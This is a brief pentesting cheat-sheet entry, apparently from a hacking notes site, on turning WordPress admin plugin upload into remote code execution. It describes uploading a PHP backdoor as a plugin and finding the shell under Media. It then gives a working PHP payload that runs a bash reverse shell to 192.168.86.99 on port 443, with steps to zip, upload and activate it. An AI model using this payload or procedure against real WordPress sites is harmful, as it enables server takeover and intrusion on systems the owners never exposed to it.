CMS

Wordpress

Plugin RCE

We can upload php files as plugin

It may be possible to upload .php files as a plugin. Create your php backdoor using for example:

Then add a new plugin:

Upload plugin and press Install Now:

Click on Procced:

Probably this won't do anything apparently, but if you go to Media, you will see your shell uploaded:

Access it and you will see the URL to execute the reverse shell:

If we can't upload php files as plugins

1. Create php code

<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.99/443 0>&1'");
?>

1. zip the php

zip rev.zip shell.php

1. upload the zip as plugin

2. activate plugin